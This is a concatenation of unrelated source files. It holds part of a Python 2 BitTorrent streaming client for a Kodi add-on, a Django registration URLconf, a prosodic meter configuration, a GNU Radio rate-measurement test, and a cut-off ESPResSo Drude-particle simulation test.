'udp://tracker.publicbt.com:80', 'http://tracker.torrentbay.to:6969/announce', 'http://tracker.pow7.com/announce', 'udp://tracker.ccc.de:80/announce', 'udp://open.demonii.com:1337', 'http://9.rarbg.com:2710/announce', 'http://bt.careland.com.cn:6969/announce', 'http://explodie.org:6969/announce', 'http://mgtracker.org:2710/announce', 'http://tracker.best-torrents.net:6969/announce', 'http://tracker.tfile.me/announce', 'http://tracker1.wasabii.com.tw:6969/announce', 'udp://9.rarbg.com:2710/announce', 'udp://9.rarbg.me:2710/announce', 'udp://coppersurfer.tk:6969/announce', 'http://www.spanishtracker.com:2710/announce', 'http://www.todotorrents.com:2710/announce' ] ### Added some trackers from MCT VIDEO_EXTS = 
{'.avi': 'video/x-msvideo', '.mp4': 'video/mp4', '.mkv': 'video/x-matroska', '.m4v': 'video/mp4', '.mov': 'video/quicktime', '.mpg': 'video/mpeg', '.ogv': 'video/ogg', '.ogg': 'video/ogg', '.webm': 'video/webm', '.ts': 'video/mp2t', '.3gp': 'video/3gpp', '.rar': 'video/unrar'} def __init__(self, url=None, port=None, ip=None, auto_shutdown=True, wait_time=20, timeout=5, auto_delete=True, temp_path=None, is_playing_fnc=None, print_status=False): # server if port: self.port = port else: self.port = random.randint(8000, 8099) if ip: self.ip = ip else: self.ip = "127.0.0.1" self.server = Server((self.ip, self.port), Handler, client=self) # Options if temp_path: self.temp_path = temp_path else: self.temp_path = DOWNLOAD_PATH self.is_playing_fnc = is_playing_fnc self.timeout = timeout self.auto_delete = auto_delete self.wait_time = wait_time self.auto_shutdown = auto_shutdown self.buffer_size = BUFFER self.first_pieces_priorize = BUFFER self.last_pieces_priorize = 5 self.state_file = "state" try: self.torrent_paramss = {'save_path': self.temp_path, 'storage_mode': lt.storage_mode_t.storage_mode_allocate} except Exception, e: try: do = xbmcgui.Dialog() e = e1 or e2 do.ok('ERROR en el cliente BT Libtorrent', 'Módulo no encontrado o imcompatible con el dispositivo.', 'Reporte el fallo adjuntando un "log".', str(e)) except: pass return # State self.has_meta = False self.meta = None self.start_time = None self.last_connect = 0 self.connected = False self.closed = False self.file = None self.files = None self._th = None self.seleccion = 0 self.index = 0 # Sesion self._cache = Cache(self.temp_path) self._ses = lt.session() #self._ses.listen_on(0, 0) ### ALFA: it blocks repro of some .torrents # Cargamos el archivo de estado (si existe) """ ### ALFA: it blocks repro of some .torrents if os.path.exists(os.path.join(self.temp_path, self.state_file)): try: f = open(os.path.join(self.temp_path, self.state_file), "rb") state = pickle.load(f) self._ses.load_state(state) f.close() 
except: pass """ self._start_services() # Monitor & Dispatcher self._monitor = Monitor(self) if print_status: self._monitor.add_listener(self.print_status) self._monitor.add_listener(self._check_meta) self._monitor.add_listener(self.save_state) self._monitor.add_listener(self.priorize_start_file) self._monitor.add_listener(self.announce_torrent) if self.auto_shutdown: self._monitor.add_listener(self._auto_shutdown) self._dispatcher = Dispatcher(self) self._dispatcher.add_listener(self._update_ready_pieces) # Iniciamos la URL if url: self.start_url(url) def set_speed_limits(self, download=0, upload=0): """ Función encargada de poner límites a la velocidad de descarga o subida """ if isinstance(download, int) and download > 0: self._th.set_download_limit(download * 1024) if isinstance(upload, int) and download > 0: self._th.set_upload_limit(upload * 1024) def get_play_list(self): """ Función encargada de generar el playlist """ # Esperamos a lo metadatos while not self.has_meta: time.sleep(1) # Comprobamos que haya archivos de video if self.files: if len(self.files) > 1: return "http://" + self.ip + ":" + str(self.port) + "/playlist.pls" else: return "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(self.files[0].path) def get_files(self): """ Función encargada de genera el listado de archivos """ # Esperamos a lo metadatos while not self.has_meta: time.sleep(1) files = [] # Comprobamos que haya archivos de video if self.files: # Creamos el dict con los archivos for file in self.files: n = file.path u = "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(n) s = file.size files.append({"name": n, "url": u, "size": s}) return files def _find_files(self, files, search=None): """ Función encargada de buscar los archivos reproducibles del torrent """ self.total_size = 0 # Obtenemos los archivos que la extension este en la lista videos = filter(lambda f: self.VIDEO_EXTS.has_key(os.path.splitext(f.path)[1]), files) if not videos: raise 
Exception('No video files in torrent') for v in videos: self.total_size += v.size ### ALFA videos[videos.index(v)].index = files.index(v) return videos def set_file(self, f): """ Función encargada de seleccionar el archivo que vamos a servir y por tanto, priorizar su descarga """ # Seleccionamos el archivo que vamos a servir fmap = self.meta.map_file(f.index, 0, 1) self.file = File(f.path, self.temp_path, f.index, f.size, fmap, self.meta.piece_length(), self) if self.seleccion < 0: ### ALFA self.file.first_piece = 0 ### ALFA self.file.last_piece = self.meta.num_pieces() ### ALFA self.file.size = self.total_size ### ALFA self.prioritize_file() def prioritize_piece(self, pc, idx): """ Función encargada de priorizar una determinada pieza """ piece_duration = 1000 min_deadline = 2000 dl = idx * piece_duration + min_deadline """ ### ALFA try: self._th.set_piece_deadline(pc, dl, lt.deadline_flags.alert_when_available) except: pass """ if idx == 0: tail_pieces = 9 # Piezas anteriores a la primera se desactivan if (self.file.last_piece - pc) > tail_pieces: for i in xrange(self.file.first_piece, pc): self._th.piece_priority(i, 0) self._th.reset_piece_deadline(i) # Piezas siguientes a la primera se activan for i in xrange(pc + 1, self.file.last_piece + 1): #self._th.piece_priority(i, 0) self._th.piece_priority(i, 1) def prioritize_file(self): """ Función encargada de priorizar las piezas correspondientes al archivo seleccionado en la funcion set_file() """ priorities = [] for i in xrange(self.meta.num_pieces()): if i >= self.file.first_piece and i <= self.file.last_piece: priorities.append(1) else: if self.index < 0: priorities.append(1) ### ALFA else: priorities.append(0) ### ALFA self._th.prioritize_pieces(priorities) x = 0 for i, _set in enumerate(self._th.piece_priorities()): if _set > 0: x += 1 #logger.info("***** Nº Pieza: %s: %s" % (i, str(_set))) logger.info("***** Piezas %s : Activas: %s" % (str(i+1), str(x))) logger.info("***** first_piece %s : last_piece: %s" % 
(str(self.file.first_piece), str(self.file.last_piece))) def download_torrent(self, url): """ Función encargada de descargar un archivo .torrent """ from core import httptools data = httptools.downloadpage(url).data return data def start_url(self, uri): """ Función encargada iniciar la descarga del torrent desde la url, permite: - Url apuntando a un .torrent - Url magnet - Archivo .torrent local """ if self._th: raise Exception('Torrent is already started') if uri.startswith('http://') or uri.startswith('https://'): torrent_data = self.download_torrent(uri) info = lt.torrent_info(lt.bdecode(torrent_data)) tp = {'ti': info} resume_data = self._cache.get_resume(info_hash=str(info.info_hash())) if resume_data: tp['resume_data'] = resume_data elif uri.startswith('magnet:'): tp = {'url': uri} resume_data = self._cache.get_resume(info_hash=Cache.hash_from_magnet(uri)) if resume_data: tp['resume_data'] = resume_data elif os.path.isfile(uri): if os.access(uri, os.R_OK): info = lt.torrent_info(uri) tp = {'ti': info} resume_data = self._cache.get_resume(info_hash=str(info.info_hash())) if resume_data: tp['resume_data'] = resume_data else: raise ValueError('Invalid torrent path %s' % uri) else: raise ValueError("Invalid torrent %s" % uri) tp.update(self.torrent_paramss) self._th = self._ses.add_torrent(tp) for tr in self.INITIAL_TRACKERS: self._th.add_tracker({'url': tr}) self._th.set_sequential_download(True) self._th.force_reannounce() self._th.force_dht_announce() self._monitor.start() self._dispatcher.do_start(self._th, self._ses) self.server.run() def stop(self): """ Función encargada de de detener el torrent y salir """ self._dispatcher.stop() self._dispatcher.join() self._monitor.stop() self.server.stop() self._dispatcher.stop() if self._ses: self._ses.pause() if self._th: self.save_resume() self.save_state() self._stop_services() self._ses.remove_torrent(self._th, self.auto_delete) del self._ses self.closed = True def pause(self): """ Función encargada de de pausar el 
torrent """ self._ses.pause() def _start_services(self): """ Función encargada de iniciar los servicios de libtorrent: dht, lsd, upnp, natpnp """ self._ses.add_dht_router("router.bittorrent.com", 6881) self._ses.add_dht_router("router.bitcomet.com", 554) self._ses.add_dht_router("router.utorrent.com", 6881) self._ses.add_dht_router("dht.transmissionbt.com",6881) ### from MCT self._ses.start_dht() self._ses.start_lsd() self._ses.start_upnp() self._ses.start_natpmp() def _stop_services(self): """ Función encargada de detener los servicios de libtorrent: dht, lsd, upnp, natpnp """ self._ses.stop_natpmp() self._ses.stop_upnp() self._ses.stop_lsd() self._ses.stop_dht() def save_resume(self): """ Función encargada guardar los metadatos para continuar una descarga mas rapidamente """ if self._th.need_save_resume_data() and self._th.is_valid() and self.meta: r = ResumeData(self) start = time.time() while (time.time() - start) <= 5: if r.data or r.failed: break time.sleep(0.1) if r.data: self._cache.save_resume(self.unique_file_id, lt.bencode(r.data)) @property def status(self): """ Función encargada de devolver el estado del torrent """ if self._th: s = self._th.status() # Download Rate s._download_rate = s.download_rate / 1024 # Progreso del archivo if self.file: pieces = s.pieces[self.file.first_piece:self.file.last_piece] ### ALFA progress = float(sum(pieces)) / len(pieces) s.pieces_len = len(pieces) ### ALFA s.pieces_sum = sum(pieces) ### ALFA #logger.info('***** Estado piezas: %s' % pieces) else: progress = 0 s.pieces_len = 0 ### ALFA s.pieces_sum = 0 ### ALFA s.progress_file = progress * 100 # Tamaño del archivo s.file_name = '' ### ALFA s.seleccion = '' ### ALFA if self.file: s.seleccion = self.seleccion ### ALFA s.file_name = self.file.path ### ALFA s.file_size = self.file.size / 1048576.0 else: s.file_size = 0 # Estado del buffer if self.file and self.file.cursor: # Con una conexion activa: Disponible vs Posicion del reproductor percent = 
len(self.file.cursor.cache) percent = percent * 100 / self.buffer_size s.buffer = int(percent) elif self.file: # Sin una conexion activa: Pre-buffer antes de iniciar # El Pre-buffer consta de dos partes_ # 1. Buffer al inicio del archivo para que el reproductor empieze sin cortes # 2. Buffer al final del archivo (en algunos archivos el reproductor mira el final del archivo antes de comenzar) bp = [] # El tamaño del buffer de inicio es el tamaño del buffer menos el tamaño del buffer del final first_pieces_priorize = self.buffer_size - self.last_pieces_priorize # Comprobamos qué partes del buffer del inicio estan disponibles for x in range(first_pieces_priorize): if self._th.have_piece(self.file.first_piece + x): bp.append(True) else: bp.append(False) # Comprobamos qué partes del buffer del final estan disponibles for x in range(self.last_pieces_priorize): if self._th.have_piece(self.file.last_piece - x): bp.append(True) else: bp.append(False) s.buffer = int(sum(bp) * 100 / self.buffer_size) else: # Si no hay ningun archivo seleccionado: No hay buffer s.buffer = 0 # Tiempo restante para cerrar en caso de tener el timeout activo if self.auto_shutdown: if self.connected: if self.timeout: s.timeout = int(self.timeout - (time.time() - self.last_connect - 1)) if self.file and self.file.cursor: s.timeout = self.timeout if s.timeout < 0: s.timeout = "Cerrando" else: s.timeout = "---" else: if self.start_time and self.wait_time: s.timeout = int(self.wait_time - (time.time() - self.start_time - 1)) if s.timeout < 0: s.timeout = "Cerrando" else: s.timeout = "---" else: s.timeout = "Off" # Estado de la descarga STATE_STR = ['En cola', 'Comprobando', 'Descargando metadata', \ 'Descargando', 'Finalizado', 'Seeding', 'Allocating', 'Comprobando fastresume'] s.str_state = STATE_STR[s.state] # Estado DHT if self._ses.dht_state() is not None: s.dht_state = "On" s.dht_nodes = self._ses.status().dht_nodes else: s.dht_state = "Off" s.dht_nodes = 0 # Cantidad de Trackers s.trackers = 
len(self._th.trackers()) # Origen de los peers s.dht_peers = 0 s.trk_peers = 0 s.pex_peers = 0 s.lsd_peers = 0 for peer in self._th.get_peer_info(): if peer.source & 1: s.trk_peers += 1 if peer.source & 2: s.dht_peers += 1 if peer.source & 4: s.pex_peers += 1 if peer.source & 8: s.lsd_peers += 1 return s """ Servicios: - Estas funciones se ejecutan de forma automatica cada x tiempo en otro Thread. - Estas funciones son ejecutadas mientras el torrent esta activo algunas pueden desactivarse segun la configuracion como por ejemplo la escritura en el log """ def _auto_shutdown(self, *args, **kwargs): """ Servicio encargado de autoapagar el servidor """ if self.file and self.file.cursor: self.last_connect = time.time() self.connected = True if self.is_playing_fnc and self.is_playing_fnc(): self.last_connect = time.time() self.connected = True if self.auto_shutdown: # shudown por haber cerrado el reproductor if self.connected and self.is_playing_fnc and not self.is_playing_fnc(): if time.time() - self.last_connect - 1 > self.timeout: self.stop() # shutdown por no realizar ninguna conexion if (not self.file or not self.file.cursor) and self.start_time and self.wait_time and not self.connected: if time.time() - self.start_time - 1 > self.wait_time: self.stop() # shutdown tras la ultima conexion if (not self.file or not self.file.cursor) and self.timeout and self.connected and not self.is_playing_fnc: if time.time() - self.last_connect - 1 > self.timeout: self.stop() def announce_torrent(self): """ Servicio encargado de anunciar el torrent """ self._th.force_reannounce() self._th.force_dht_announce() def save_state(self): """ Servicio encargado de guardar el estado """ state = self._ses.save_state() f = open(os.path.join(self.temp_path, self.state_file), 'wb') pickle.dump(state, f) f.close() def _update_ready_pieces(self, alert_type, alert): """ Servicio encargado de informar que hay una pieza disponible """ if alert_type == 'read_piece_alert' and self.file: 
self.file.update_piece(alert.piece, alert.buffer) def _check_meta(self): """ Servicio encargado de comprobar si los metadatos se han descargado """ if self.status.state >= 3 and self.status.state <= 5 and not self.has_meta: # Guardamos los metadatos self.meta = self._th.get_torrent_info() # Obtenemos la lista de archivos del meta fs = self.meta.files() if isinstance(fs, list): files = fs else: files = [fs.at(i) for i in xrange(fs.num_files())] # Guardamos la lista de archivos self.files = self._find_files(files) # Si hay varios vídeos (no RAR), se selecciona el vídeo o "todos" lista = [] seleccion = 0 for file in self.files: if '.rar' in str(file.path): seleccion = -9 lista += [os.path.split(str(file.path))[1]] if len(lista) > 1 and seleccion >= 0: d = xbmcgui.Dialog() seleccion = d.select(msg_header + ": Selecciona el vídeo, o 'Cancelar' para todos", lista) if seleccion < 0: index = 0 self.index = seleccion else: index = seleccion self.index = self.files[index].index self.seleccion = seleccion # Marcamos el primer archivo como activo self.set_file(self.files[index]) # Damos por iniciada la descarga self.start_time = time.time() # Guardamos el .torrent en el cache self._cache.file_complete(self._th.get_torrent_info()) self.has_meta = True def priorize_start_file(self): ''' Servicio encargado de priorizar el principio y final de archivo cuando no hay conexion ''' if self.file and not self.file.cursor: num_start_pieces = self.buffer_size - self.last_pieces_priorize # Cantidad de piezas a priorizar al inicio num_end_pieces = self.last_pieces_priorize # Cantidad de piezas a priorizar al final pieces_count = 0 # Priorizamos las ultimas piezas for y in range(self.file.last_piece - num_end_pieces, self.file.last_piece + 1): if not self._th.have_piece(y): self.prioritize_piece(y, pieces_count) pieces_count += 1 # Priorizamos las primeras piezas for y in range(self.file.first_piece, self.file.last_piece + 1): if not self._th.have_piece(y): if pieces_count == 
self.buffer_size: break self.prioritize_piece(y, pieces_count) pieces_count += 1 def print_status(self): ''' Servicio encargado de mostrar en el log el estado de la descarga ''' s = self.status ### ALFA if self.seleccion >= 0: archivo = self.seleccion + 1 else: archivo = self.seleccion logger.info( '%.2f%% de %.1fMB %s | %.1f kB/s | #%s %d%% | AutoClose: %s | S: %d(%d) P: %d(%d)) | TRK: %d DHT: %d PEX: %d LSD %d | DHT:%s (%d) | Trakers: %d | Pieces: %d (%d)' % \ (s.progress_file, s.file_size, s.str_state, s._download_rate, archivo, s.buffer, s.timeout, s.num_seeds, \ s.num_complete, s.num_peers, s.num_incomplete, s.trk_peers, s.dht_peers, s.pex_peers, s.lsd_peers, s.dht_state, s.dht_nodes, s.trackers, s.pieces_sum, s.pieces_len)) ### ALFA
a-krebs/finances
finances/django_registration/urls.py
# Copyright (C) 2012 Aaron Krebs akrebs@ualberta.ca

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>

# URLconf wiring django-registration's simple one-step backend together with
# the stock django.contrib.auth function-based views, all rendered through
# hamlpy templates.
#
# NOTE(review): this module relies on APIs removed in later Django releases
# (`patterns()`, `direct_to_template`, `django.core.urlresolvers`) -- it is
# tied to a pre-1.5 Django; confirm the target Django version before touching
# the imports.

from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy

from registration.views import register

urlpatterns = patterns('',
    # urls for simple one-step registration
    url(r'^register/$',
        register,
        {'backend': 'registration.backends.simple.SimpleBackend',
         'template_name': 'registration/registration_form.hamlpy',
        },
        name='registration_register'
    ),
    url(r'^register/closed/$',
        direct_to_template,
        {'template': 'registration/registration_closed.hamlpy'},
        name='registration_disallowed'
    ),
    url(r'^login/$',
        auth_views.login,
        {'template_name': 'registration/login.hamlpy'},
        name='auth_login'
    ),
    url(r'^logout/$',
        auth_views.logout,
        {'template_name': 'registration/logout.hamlpy'},
        name='auth_logout'
    ),
    url(r'^password/change/$',
        auth_views.password_change,
        {'template_name': 'registration/password_change_form.hamlpy',
        # ugh, this is tied to the namespace; needs to be namespace-agnostic
        # since the namespace is determined by the importing app
        # TODO: see Issue #1
        'post_change_redirect': reverse_lazy('registration:auth_password_change_done')
        },
        name='auth_password_change'
    ),
    url(r'^password/change/done/$',
        auth_views.password_change_done,
        {'template_name': 'registration/password_change_done.hamlpy'},
        name='auth_password_change_done'
    ),
    url(r'^password/reset/$',
        auth_views.password_reset,
        {'template_name': 'registration/password_reset_form.hamlpy',
        # same issue as above
        'post_reset_redirect': reverse_lazy('registration:auth_password_reset_done'),
        'email_template_name': 'registration/password_reset_email.hamlpy',
        'subject_template_name': 'registration/password_reset_subject.hamlpy',
        },
        name='auth_password_reset'
    ),
    url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
        auth_views.password_reset_confirm,
        {'template_name': 'registration/password_reset_confirm.hamlpy',
        # same issue as above
        'post_reset_redirect': reverse_lazy('registration:auth_password_reset_complete'),
        },
        name='auth_password_reset_confirm'
    ),
    url(r'^password/reset/complete/$',
        auth_views.password_reset_complete,
        {'template_name': 'registration/password_reset_complete.hamlpy'},
        name='auth_password_reset_complete'
    ),
    url(r'^password/reset/done/$',
        auth_views.password_reset_done,
        {'template_name': 'registration/password_reset_done.hamlpy'},
        name='auth_password_reset_done'
    ),
)
quadrismegistus/prosodic
meters/strength_and_resolution.py
############################################
# [config.py]
# CONFIGURATION SETTINGS FOR A PARTICULAR METER
#
# Long-form name of this meter:
name = "*PEAK only"
#
# Constraint dictionary read by the metrical parser:
# keys are constraint names, values are violation weights.
# [Do not remove or comment out the following line]
Cs = {}
############################################

############################################
# STRUCTURE PARAMETERS
#
# Parameters under the poet's conscious control -- "formally independent of
# phonological structure" (Kiparsky & Hanson 1996) -- as opposed to the
# realization parameters configured further below, which determine how the
# structure is linguistically manifested.
#
# [Number of feet in a line] -- uncomment one to require a fixed length:
#Cs['number_feet!=2'] = 1   # require dimeter
#Cs['number_feet!=3'] = 1   # require trimeter
#Cs['number_feet!=4'] = 1   # require tetrameter
#Cs['number_feet!=5'] = 1   # require pentameter
#Cs['number_feet!=6'] = 1   # require hexameter
#Cs['number_feet!=7'] = 1   # require heptameter
#
# [Headedness of the line]:
#Cs['headedness!=falling'] = 1   # require falling rhythm (trochaic, dactylic)
#Cs['headedness!=rising'] = 1    # require rising rhythm (iambic, anapestic)
############################################

############################################
# REALIZATION PARAMETERS: POSITION SIZE
#
# Maximum number of syllables allowed in strong ("s") and weak ("w")
# metrical positions (cf. Kiparsky & Hanson's "position size" parameter):
maxS = 2
maxW = 2
#
# (Recommended) Positions are at minimum one syllable in size.
# Set to 1 to allow positions as small as a single mora, i.e. a split heavy
# syllable may straddle two metrical positions (unrecommended):
splitheavies = 0
############################################

############################################
# REALIZATION PARAMETERS: METRICAL CONSTRAINTS
#
# Constraint weights do not affect harmonic bounding (i.e. which parses
# survive as possibilities), only how the survivors are ranked to pick the
# "best" parse.
#
# [STRENGTH] A syllable is strong if it is a stress peak in a polysyllabic
# word, weak if it is a trough, and neutral if level with its neighbours
# (so 'liberty' is strong-weak-neutral).
#
# A weak metrical position may not contain any strong syllables ("peaks"):
# [Kiparsky and Hanson believe this is Shakespeare's meter]
Cs['strength.w=>-p'] = 1
#
# Stricter alternative -- no weak syllables ("troughs") in strong positions:
#Cs['strength.s=>-u'] = 1
# Laxer alternatives:
#Cs['strength.s=>p'] = 3   # strong position must hold a strong syllable
#Cs['strength.w=>u'] = 3   # weak position must hold a weak syllable
#
# [STRESS] analogous constraints on stressed/unstressed syllables:
#Cs['stress.s=>-u'] = 1    # [Hopkins' meter, per Kiparsky & Hanson]
#Cs['stress.w=>-p'] = 1
#Cs['stress.s=>p'] = 2
#Cs['stress.w=>u'] = 2
#
# [WEIGHT] analogous constraints on syllable quantity (designed for
# quantitative verse, e.g. classical Latin and Greek):
#Cs['weight.s=>-u'] = 2
#Cs['weight.w=>-p'] = 2
#Cs['weight.s=>p'] = 2
#Cs['weight.w=>u'] = 2
#
# [DISYLLABIC POSITIONS]
# [(with thanks to Sam Bowman, who programmed many of these constraints)]
#
# W-resolution: a disyllabic position should not contain more than a minimal
# foot, i.e. its first syllable must be light and unstressed:
Cs['footmin-w-resolution'] = 1
#
# F-resolution: a disyllabic position crossing a word boundary is allowed
# only when both words are function words in a weak metrical position:
Cs['footmin-f-resolution'] = 1
#
# Other (disabled) disyllabic-position options include, among others:
#Cs['footmin-noHX'] = 1000        # only light-light / light-heavy positions
#Cs['footmin-none'] = 1           # forbid disyllabic positions entirely
#Cs['footmin-wordbound'] = 1000   # forbid crossing a word boundary
#Cs['posthoc-no-final-ww'] = 2    # final position must not be 'ww'
#
# [MISCELLANEOUS]
#
# The first two metrical positions will not be evaluated for any of the
# strength/stress/weight correspondence constraints:
Cs['skip_initial_foot'] = 1
#
# Other (disabled) options:
#Cs['functiontow'] = 2       # function words only in weak positions
#Cs['initialstrong'] = 2     # initial syllable must be in a weak position
#Cs['word-elision'] = 1      # discourage elisions
#Cs['kalevala.w=>-p'] = 1    # Finnish "Kalevala" meter (stressed+heavy)
#Cs['kalevala.s=>-u'] = 1    # Finnish "Kalevala" meter (stressed+light)
############################################
andrmuel/gr-dab
python/qa/qa_measure_processing_rate.py
#!/usr/bin/env python

from gnuradio import gr, gr_unittest
from gnuradio import blocks
import grdab


class qa_measure_processing_rate(gr_unittest.TestCase):
    """
    @brief QA for measure processing rate sink.

    This class implements a test bench to verify the corresponding C++ class.
    """

    def setUp(self):
        self.tb = gr.top_block()

    def tearDown(self):
        self.tb = None

    def test_001_measure_processing_rate(self):
        # Complex stream throttled to 1 Msps; the sink's measured rate
        # should land within +/-10% of the throttle rate.
        src = blocks.null_source(gr.sizeof_gr_complex)
        throttle = blocks.throttle(gr.sizeof_gr_complex, 1000000)
        head = blocks.head(gr.sizeof_gr_complex, 200000)
        sink = grdab.measure_processing_rate(gr.sizeof_gr_complex, 100000)
        self.tb.connect(src, throttle, head, sink)
        self.tb.run()
        rate = sink.processing_rate()
        # fix: use unittest assertions instead of bare assert -- bare assert
        # is stripped under `python -O` and gives no diagnostic on failure
        self.assertGreater(rate, 900000)
        self.assertLess(rate, 1100000)

    def test_002_measure_processing_rate(self):
        # Byte stream throttled to 10 Msps; expect a rate within +/-20%.
        src = blocks.null_source(gr.sizeof_char)
        throttle = blocks.throttle(gr.sizeof_char, 10000000)
        head = blocks.head(gr.sizeof_char, 1000000)
        sink = grdab.measure_processing_rate(gr.sizeof_char, 1000000)
        self.tb.connect(src, throttle, head, sink)
        self.tb.run()
        rate = sink.processing_rate()
        self.assertGreater(rate, 8000000)
        self.assertLess(rate, 12000000)


if __name__ == '__main__':
    gr_unittest.main()
hmenke/espresso
testsuite/python/drude.py
# Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import unittest as ut
import espressomd
import espressomd.electrostatics
import espressomd.interactions
from espressomd import drude_helpers


class Drude(ut.TestCase):

    @ut.skipIf(not espressomd.has_features("P3M", "THOLE", "LANGEVIN_PER_PARTICLE"),
               "Test needs P3M, THOLE and LANGEVIN_PER_PARTICLE")
    def test(self):
        """
        Sets up a BMIM PF6 pair separated in y-direction with fixed cores.
        Adds the Drude particles and related features (intramolecular
        exclusion bonds, Thole screening) via helper functions.
        Calculates the induced dipole moment and the diagonals of the
        polarization tensor and compares against reference results, which
        were reproduced with LAMMPS.
        """

        box_l = 50
        system = espressomd.System(box_l=[box_l, box_l, box_l])
        # seed per node; fixed so the Langevin noise sequence is reproducible
        system.seed = system.cell_system.get_state()['n_nodes'] * [12]
        np.random.seed(12)

        #Reference Results, reproduced with LAMMPS
        #Dipole Moments (in Debye; compared after eA -> Debye conversion below)
        ref_mu0_pf6 = [0.00177594, 0.16480996, -0.01605161]
        ref_mu0_c1 = [0.00076652, 0.15238767, 0.00135291]
        ref_mu0_c2 = [-0.00020222, 0.11084197, 0.00135842]
        ref_mu0_c3 = [0.00059177, 0.23949626, -0.05238468]
        ref_mu0_bmim = [0.00115606, 0.5027259, -0.04967335]

        #Polarisation Tensor diagonals
        ref_pol_pf6 = [
            4.5535698335873445, 4.7558611769477697, 4.5546580162000554]
        ref_pol_bmim = [
            13.126868394164262, 14.392582501485913, 16.824150151623762]

        #TIMESTEP
        fs_to_md_time = 1.0e-2
        time_step_fs = 0.5
        time_step_ns = time_step_fs * 1e-6
        dt = time_step_fs * fs_to_md_time

        #COM TEMPERATURE
        #Global thermostat temperature, for com and langevin.
        #LangevinPerParticle temperature is set to 0 for drude and core to
        #properly account for com forces. Like that, langevin thermostat can
        #still be used for non-drude particles
        SI_temperature = 300.0
        gamma_com = 1.0
        kb_kjmol = 0.0083145
        temperature_com = SI_temperature * kb_kjmol

        # COULOMB PREFACTOR (elementary charge)^2 / (4*pi*epsilon_0) in
        # Angstrom * kJ/mol
        coulomb_prefactor = 1.67101e5 * kb_kjmol

        #POLARIZATION
        #polarization = 1.0 #In (Angstrom^3)_CGS
        # alpha_SI = 4*Pi*eps_0 alpha_CGS;
        # 4*Pi*epsilon_0*Angstrom^3/((elementary charge)^2*Angstrom^2*N_A/kJ)
        conv_pol_CGS_SI = 7.197586e-4
        #alpha = conv_pol_CGS_SI*args.polarization

        #DRUDE/TOTAL MASS
        #lamoureux03 used values 0.1-0.8 g/mol for drude mass
        mass_drude = 0.8
        mass_tot = 100.0
        mass_core = mass_tot - mass_drude
        mass_red_drude = mass_drude * mass_core / mass_tot

        #SPRING CONSTANT DRUDE
        #Used 1000kcal/mol/A^2 from lamoureux03a table 1 p 3031
        k_drude = 4184.0  # in kJ/mol/A^2
        T_spring = 2.0 * np.pi * np.sqrt(mass_drude / k_drude)
        #T_spring_fs = T_spring/fs_to_md_time
        #Period of free oscillation: T_spring = 2Pi/w; w = sqrt(k_d/m_d)

        #TEMP DRUDE
        # Used T* = 1K from lamoureux03a p 3031 (2) 'Cold drude oscillators
        # regime'
        SI_temperature_drude = 1.0
        temperature_drude = SI_temperature_drude * kb_kjmol

        #GAMMA DRUDE
        #Thermostat relaxation time should be similar to T_spring
        gamma_drude = mass_red_drude / T_spring

        system.cell_system.skin = 0.4
        system.time_step = dt

        #Forcefield: particle types, charges, polarizabilities and masses
        #for the PF6 anion and the three BMIM cation sites (plus COM).
        types = {"PF6": 0, "BMIM_C1": 1, "BMIM_C2": 2, "BMIM_C3": 3,
                 "BMIM_COM": 4, "PF6_D": 5, "BMIM_C1_D": 6, "BMIM_C2_D": 7,
                 "BMIM_C3_D": 8}
        charges = {"PF6": -0.78, "BMIM_C1": 0.4374,
                   "BMIM_C2": 0.1578, "BMIM_C3": 0.1848, "BMIM_COM": 0}
        polarizations = {"PF6": 4.653, "BMIM_C1": 5.693,
                         "BMIM_C2": 2.103, "BMIM_C3": 7.409}
        masses = {"PF6": 144.96, "BMIM_C1": 67.07,
                  "BMIM_C2": 15.04, "BMIM_C3": 57.12, "BMIM_COM": 0}
        masses["BMIM_COM"] = masses["BMIM_C1"] + \
            masses["BMIM_C2"] + masses["BMIM_C3"]

        box_center = 0.5 * np.array(3 * [box_l])
        system.min_global_cut = 3.5

        #Place Particles
        dmol = 5.0

        #Test Anion
        pos_pf6 = box_center + np.array([0, dmol, 0])
        system.part.add(id=0, type=types["PF6"], pos=pos_pf6, q=charges[
            "PF6"], mass=masses["PF6"], fix=[1, 1, 1])

        pos_com = box_center - np.array([0, dmol, 0])
        system.part.add(id=2, type=types["BMIM_C1"], pos=pos_com + [
            0, -0.527, 1.365], q=charges["BMIM_C1"],
            mass=masses["BMIM_C1"], fix=[1, 1, 1])
        system.part.add(id=4, type=types["BMIM_C2"], pos=pos_com + [
            0, 1.641, 2.987], q=charges["BMIM_C2"],
            mass=masses["BMIM_C2"], fix=[1, 1, 1])
        system.part.add(id=6, type=types["BMIM_C3"], pos=pos_com + [
            0, 0.187, -2.389], q=charges["BMIM_C3"],
            mass=masses["BMIM_C3"], fix=[1, 1, 1])

        system.thermostat.set_langevin(kT=temperature_com, gamma=gamma_com)

        p3m = espressomd.electrostatics.P3M(
            prefactor=coulomb_prefactor, accuracy=1e-4, mesh=[18, 18, 18],
            cao=5)
        system.actors.add(p3m)

        #Drude related Bonds
        thermalized_dist_bond = espressomd.interactions.ThermalizedBond(
            temp_com=temperature_com, gamma_com=gamma_com,
            temp_distance=temperature_drude, gamma_distance=gamma_drude,
            r_cut=1.0)
        harmonic_bond = espressomd.interactions.HarmonicBond(
            k=k_drude, r_0=0.0, r_cut=1.0)
        system.bonded_inter.add(thermalized_dist_bond)
